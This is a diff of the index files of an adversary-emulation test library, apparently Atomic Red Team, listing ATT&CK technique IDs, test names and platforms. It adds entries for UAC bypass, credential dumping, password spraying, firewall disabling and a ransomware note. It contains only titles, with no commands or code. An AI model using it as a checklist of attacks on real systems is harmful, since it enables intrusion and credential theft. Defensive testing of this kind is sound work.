 defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt
 defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt
 defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
@@ -182,10 +187,11 @@ defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service
 defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt
 defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt
 defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
-defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
-defense-evasion,T1562.004,Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
+defense-evasion,T1562.004,Disable or Modify System Firewall,3,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,4,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,5,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt
+defense-evasion,T1562.004,Disable or Modify System Firewall,6,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell
+defense-evasion,T1562.004,Disable or Modify System Firewall,7,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,10,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,11,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt
 defense-evasion,T1562.001,Disable or Modify Tools,12,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell
@@ -212,7 +218,7 @@ defense-evasion,T1564.001,Hidden Files and Directories,3,Create Windows System F
 defense-evasion,T1564.001,Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt
 defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell
 defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell
-defense-evasion,T1564,Hide Artifacts,2,"Create a user called ""$"" as noted here",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
+defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt
 defense-evasion,T1564,Hide Artifacts,3,"Create an ""Administrator "" user (with a space on the end)",5bb20389-39a5-4e99-9264-aeb92a55a85c,powershell
 defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
 defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe,cecfea7a-5f03-4cdd-8bc8-6f7c22862440,command_prompt
@@ -231,6 +237,8 @@ defense-evasion,T1218.004,InstallUtil,8,InstallUtil evasive invocation,559e6d06-
 defense-evasion,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 defense-evasion,T1127.001,MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
 defense-evasion,T1127.001,MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
+defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
 defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
 defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
 defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt
@@ -295,7 +303,7 @@ defense-evasion,T1036.003,Rename System Utilities,6,Masquerading - non-windows e
 defense-evasion,T1036.003,Rename System Utilities,7,Masquerading - windows exe running as different windows exe,c3d24a39-2bfe-4c6a-b064-90cd73896cb0,powershell
 defense-evasion,T1036.003,Rename System Utilities,8,Malicious process Masquerading as LSM.exe,83810c46-f45e-4485-9ab6-8ed0e9e6ed7f,command_prompt
 defense-evasion,T1036.003,Rename System Utilities,9,File Extension Masquerading,c7fa0c3b-b57f-4cba-9118-863bf4e653fc,command_prompt
-defense-evasion,T1207,Rogue Domain Controller,1,DCShadow - Mimikatz,0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
+defense-evasion,T1207,Rogue Domain Controller,1,DCShadow (Active Directory),0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6,powershell
 defense-evasion,T1014,Rootkit,3,Windows Signed Driver Rootkit Test,8e4e1985-9a19-4529-b4b8-b7a49ff87fae,command_prompt
 defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt
 defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
@@ -409,6 +417,7 @@ impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f8
 impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
 impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
 impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
+impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
 impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
 impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
 impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
@@ -436,6 +445,7 @@ discovery,T1087.002,Domain Account,6,Adfind - Enumerate Active Directory Admins,
 discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Objects,e1ec8d20-509a-4b9a-b820-06c9b2da8eb7,command_prompt
 discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
 discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
+discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -526,6 +536,7 @@ command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used p
 command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
 command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
 command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
+command-and-control,T1132.001,Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
 command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
 command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
 execution,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
@@ -567,6 +578,7 @@ execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8
 execution,T1053.005,Scheduled Task,6,WMI Invoke-CimMethod Scheduled Task,e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b,powershell
 execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
 execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
+execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
 execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
 execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell
@@ -595,6 +607,7 @@ lateral-movement,T1021.002,SMB/Windows Admin Shares,1,Map admin share,3386975b-3
 lateral-movement,T1021.002,SMB/Windows Admin Shares,2,Map Admin Share PowerShell,514e9cd7-9207-4882-98b1-c8f791bae3c5,powershell
 lateral-movement,T1021.002,SMB/Windows Admin Shares,3,Copy and Execute File with PsExec,0eb03d41-79e4-4393-8e57-6344856be1cf,command_prompt
 lateral-movement,T1021.002,SMB/Windows Admin Shares,4,Execute command writing output to local Admin Share,d41aaab5-bdfe-431d-a3d5-c29e9136ff46,command_prompt
+lateral-movement,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 lateral-movement,T1021.006,Windows Remote Management,1,Enable Windows Remote Management,9059e8de-3d7d-4954-a322-46161880b9cf,powershell
 lateral-movement,T1021.006,Windows Remote Management,2,Invoke-Command,5295bd61-bd7e-4744-9d52-85962a4cf2d6,powershell
 lateral-movement,T1021.006,Windows Remote Management,3,WinRM Access with Evil-WinRM,efe86d95-44c4-4509-ae42-7bfd9d1f5b3d,powershell
@@ -15,14 +15,19 @@
  - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux]
 - [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
  - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
+  - Atomic Test #1: SSH Credential Stuffing From Linux [linux]
+  - Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
 - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
  - Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
  - Atomic Test #2: Extract passwords with grep [macos, linux]
  - Atomic Test #3: Extracting passwords with findstr [windows]
  - Atomic Test #4: Access unattend.xml [windows]
+  - Atomic Test #5: Find and Access Github Credentials [macos, linux]
 - [T1555 Credentials from Password Stores](../../T1555/T1555.md)
  - Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
+  - Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
+  - Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
 - [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
  - Atomic Test #1: Run Chrome-password Collector [windows]
  - Atomic Test #2: Search macOS Safari Cookies [macos]
@@ -31,7 +36,7 @@
  - Atomic Test #1: Enumeration for Credentials in Registry [windows]
  - Atomic Test #2: Enumeration for PuTTY Credentials in Registry [windows]
 - [T1003.006 DCSync](../../T1003.006/T1003.006.md)
-  - Atomic Test #1: DCSync [windows]
+  - Atomic Test #1: DCSync (Active Directory) [windows]
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1187 Forced Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -40,7 +45,7 @@
  - Atomic Test #1: AppleScript - Prompt User for Password [macos]
  - Atomic Test #2: PowerShell - Prompt User for Password [windows]
 - [T1558.001 Golden Ticket](../../T1558.001/T1558.001.md)
-  - Atomic Test #1: Crafting golden tickets with mimikatz [windows]
+  - Atomic Test #1: Crafting Active Directory golden tickets with mimikatz [windows]
 - [T1552.006 Group Policy Preferences](../../T1552.006/T1552.006.md)
  - Atomic Test #1: GPP Passwords (findstr) [windows]
  - Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
@@ -86,25 +91,30 @@
 - [T1003 OS Credential Dumping](../../T1003/T1003.md)
  - Atomic Test #1: Gsecdump [windows]
  - Atomic Test #2: Credential Dumping with NPPSpy [windows]
+  - Atomic Test #3: Dump svchost.exe to gather RDP credentials [windows]
 - [T1110.002 Password Cracking](../../T1110.002/T1110.002.md)
  - Atomic Test #1: Password Cracking with Hashcat [windows]
 - [T1556.002 Password Filter DLL](../../T1556.002/T1556.002.md)
  - Atomic Test #1: Install and Register Password Filter DLL [windows]
 - [T1110.001 Password Guessing](../../T1110.001/T1110.001.md)
-  - Atomic Test #1: Brute Force Credentials of all domain users via SMB [windows]
-  - Atomic Test #2: Brute Force Credentials of single domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
+  - Atomic Test #1: Brute Force Credentials of all Active Directory domain users via SMB [windows]
+  - Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows]
+  - Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad]
 - T1555.005 Password Managers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1110.003 Password Spraying](../../T1110.003/T1110.003.md)
  - Atomic Test #1: Password Spray all Domain Users [windows]
  - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
-  - Atomic Test #3: Password spray all domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
+  - Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
+  - Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
 - T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
  - Atomic Test #1: Private Keys [windows]
  - Atomic Test #2: Discover Private SSH Keys [macos, linux]
  - Atomic Test #3: Copy Private SSH Keys with CP [linux]
  - Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- T1003.007 Proc Filesystem [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1003.007 Proc Filesystem](../../T1003.007/T1003.007.md)
+  - Atomic Test #1: Dump individual process memory with sh (Local) [linux]
+  - Atomic Test #2: Dump individual process memory with Python (Local) [linux]
 - T1606.002 SAML Tokens [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1003.002 Security Account Manager](../../T1003.002/T1003.002.md)
  - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
@@ -227,6 +237,7 @@
  - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
  - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
  - Atomic Test #8: Disable UAC using reg.exe [windows]
+  - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
 - [T1574.012 COR_PROFILER](../../T1574.012/T1574.012.md)
  - Atomic Test #1: User scope COR_PROFILER [windows]
  - Atomic Test #2: System Scope COR_PROFILER [windows]
@@ -323,6 +334,8 @@
 - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
  - Atomic Test #1: rc.common [macos]
+  - Atomic Test #2: rc.common [linux]
+  - Atomic Test #3: rc.local [linux]
 - [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
  - Atomic Test #1: Re-Opened Applications [macos]
  - Atomic Test #2: Re-Opened Applications [macos]
@@ -366,6 +379,7 @@
  - Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
 - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
  - Atomic Test #1: Create Systemd Service [linux]
+  - Atomic Test #2: Create Systemd Service file,  Enable the service , Modify and Reload the service. [linux]
 - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
  - Atomic Test #1: Create Systemd Service and Timer [linux]
 - T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -417,6 +431,7 @@
  - Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
  - Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
  - Atomic Test #8: Disable UAC using reg.exe [windows]
+  - Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
 - [T1218.003 CMSTP](../../T1218.003/T1218.003.md)
  - Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
  - Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -489,10 +504,11 @@
 - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
  - Atomic Test #1: Disable firewall [linux]
  - Atomic Test #2: Disable Microsoft Defender Firewall [windows]
-  - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
-  - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
-  - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
-  - Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
+  - Atomic Test #3: Disable Microsoft Defender Firewall via Registry [windows]
+  - Atomic Test #4: Allow SMB and RDP on Microsoft Defender Firewall [windows]
+  - Atomic Test #5: Opening ports for proxy - HARDRAIN [windows]
+  - Atomic Test #6: Open a local port through Windows Firewall to any profile [windows]
+  - Atomic Test #7: Allow Executable Through Firewall Located in Non-Standard Location [windows]
 - [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md)
  - Atomic Test #1: Disable syslog [linux]
  - Atomic Test #2: Disable Cb Response [linux]
@@ -566,7 +582,7 @@
  - Atomic Test #1: Hidden Window [windows]
 - [T1564 Hide Artifacts](../../T1564/T1564.md)
  - Atomic Test #1: Extract binary files via VBA [windows]
-  - Atomic Test #2: Create a user called "$" as noted here [windows]
+  - Atomic Test #2: Create a Hidden User Called "$" [windows]
  - Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1562.003 Impair Command History Logging](../../T1562.003/T1562.003.md)
@@ -616,13 +632,16 @@
  - Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
  - Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
 - T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1553.005 Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1553.005 Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
+  - Atomic Test #1: Mount ISO image [windows]
+  - Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
 - [T1036.004 Masquerade Task or Service](../../T1036.004/T1036.004.md)
  - Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
  - Atomic Test #2: Creating W32Time similar named service using sc [windows]
 - [T1036 Masquerading](../../T1036/T1036.md)
  - Atomic Test #1: System File Copied to Unusual Location [windows]
- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
+  - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1112 Modify Registry](../../T1112/T1112.md)
@@ -726,7 +745,7 @@
 - T1578.004 Revert Cloud Instance [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1207 Rogue Domain Controller](../../T1207/T1207.md)
-  - Atomic Test #1: DCShadow - Mimikatz [windows]
+  - Atomic Test #1: DCShadow (Active Directory) [windows]
 - [T1014 Rootkit](../../T1014/T1014.md)
  - Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
  - Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
@@ -831,10 +850,14 @@
 - [T1098 Account Manipulation](../../T1098/T1098.md)
  - Atomic Test #1: Admin Account Manipulate [windows]
  - Atomic Test #2: Domain Account and Group Manipulate [windows]
+  - Atomic Test #3: AWS - Create a group and add a user to that group [iaas:aws]
 - T1547.014 Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1098.003 Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1137.006 Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1098.001 Additional Cloud Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1098.001 Additional Cloud Credentials](../../T1098.001/T1098.001.md)
+  - Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
+  - Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
+  - Atomic Test #3: AWS - Create Access Key and Secret Key [iaas:aws]
 - T1546.009 AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1546.010 AppInit DLLs](../../T1546.010/T1546.010.md)
  - Atomic Test #1: Install AppInit Shim [windows]
@@ -866,7 +889,8 @@
  - Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
 - [T1546.001 Change Default File Association](../../T1546.001/T1546.001.md)
  - Atomic Test #1: Change Default File Association [windows]
- T1136.003 Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1136.003 Cloud Account](../../T1136.003/T1136.003.md)
+  - Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
 - T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1546.015 Component Object Model Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -965,6 +989,8 @@
 - T1547.012 Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
  - Atomic Test #1: rc.common [macos]
+  - Atomic Test #2: rc.common [linux]
+  - Atomic Test #3: rc.local [linux]
 - T1542.004 ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
  - Atomic Test #1: Re-Opened Applications [macos]
@@ -1006,6 +1032,7 @@
 - T1542.001 System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1543.002 Systemd Service](../../T1543.002/T1543.002.md)
  - Atomic Test #1: Create Systemd Service [linux]
+  - Atomic Test #2: Create Systemd Service file,  Enable the service , Modify and Reload the service. [linux]
 - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
  - Atomic Test #1: Create Systemd Service and Timer [linux]
 - T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1048,6 +1075,7 @@
  - Atomic Test #2: Encrypt files using 7z (Linux) [linux]
  - Atomic Test #3: Encrypt files using ccrypt (Linux) [linux]
  - Atomic Test #4: Encrypt files using openssl (Linux) [linux]
+  - Atomic Test #5: PureLocker Ransom Note [windows]
 - T1565 Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1119,6 +1147,7 @@
  - Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
  - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
  - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
+  - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
 - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
  - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
  - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -1424,7 +1453,8 @@
  - Atomic Test #1: Execute a Command as a Service [windows]
  - Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
 - T1129 Shared Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1072 Software Deployment Tools](../../T1072/T1072.md)
+  - Atomic Test #1: Radmin Viewer Utility [windows]
 - T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1569 System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
@@ -1479,7 +1509,8 @@
 - T1021.004 SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1051 Shared Webroot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1072 Software Deployment Tools](../../T1072/T1072.md)
+  - Atomic Test #1: Radmin Viewer Utility [windows]
 - T1080 Taint Shared Content [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1021.005 VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -1527,6 +1558,7 @@
  - Atomic Test #11: OSTAP Worming Activity [windows]
  - Atomic Test #12: svchost writing a file to a UNC path [windows]
  - Atomic Test #13: Download a File with Windows Defender MpCmdRun.exe [windows]
+  - Atomic Test #14: whois file download [linux, macos]
 - [T1090.001 Internal Proxy](../../T1090.001/T1090.001.md)
  - Atomic Test #1: Connection Proxy [macos, linux]
  - Atomic Test #2: Connection Proxy for macOS UI [macos]
@@ -1555,6 +1587,7 @@
  - Atomic Test #3: LogMeIn Files Detected Test on Windows [windows]
 - [T1132.001 Standard Encoding](../../T1132.001/T1132.001.md)
  - Atomic Test #1: Base64 Encoded data. [macos, linux]
+  - Atomic Test #2: XOR Encoded data. [windows]
 - T1001.002 Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -11,9 +11,11 @@
 - [T1552.007 Container API](../../T1552.007/T1552.007.md)
  - Atomic Test #1: ListSecrets [macos, linux]
  - Atomic Test #2: Cat the contents of a Kubernetes service account token file [linux]
- T1110.004 Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
+  - Atomic Test #1: SSH Credential Stuffing From Linux [linux]
 - [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
  - Atomic Test #2: Extract passwords with grep [macos, linux]
+  - Atomic Test #5: Find and Access Github Credentials [macos, linux]
